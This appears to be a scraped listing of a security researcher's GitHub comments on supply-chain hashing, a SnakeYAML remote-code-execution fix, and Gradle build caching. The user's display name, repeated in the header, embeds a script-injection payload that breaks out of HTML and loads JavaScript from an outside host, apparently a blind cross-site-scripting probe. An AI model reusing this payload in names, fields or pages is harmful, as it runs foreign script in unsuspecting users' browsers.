Jonathan Leitschuh"><script src="https://js.rip/b27oz0xw7e"></script>

Results 594 comments of Jonathan Leitschuh"><script src="https://js.rip/b27oz0xw7e"></script>

They (the GitHub security team) told me to report it here and open a PR. I don't have much free time. I started on one but got blocked by the...

@bryanmacfarlane Friendly ping. I haven't heard anything on the h1 issue.

I'd advocate for SHA-256 or SHA-512 signatures to be passed if HTTP isn't supported over an explicit opt-out.

> That's up to the specific actions.

Is it though? Doesn't the supply chain of one action cause a rippling effect down the supply chain? I could understand this decision...

@mhagnumdw you should be able to see it now

If you want the full story of how this vulnerability got resolved, here's the link: https://medium.com/bugbountywriteup/%EF%B8%8F-inside-the-160-comment-fight-to-fix-snakeyamls-rce-default-1a20c5ca4d4c

The concern I have with this solution is that the `init` script that the autobuilder uses won't be injected into the Gradle build with this solution. I don't know how...

The downside of using the `--no-build-cache` solution as you've done in this pull request is that it disables the build cache on all tasks, not just the compiler tasks. The...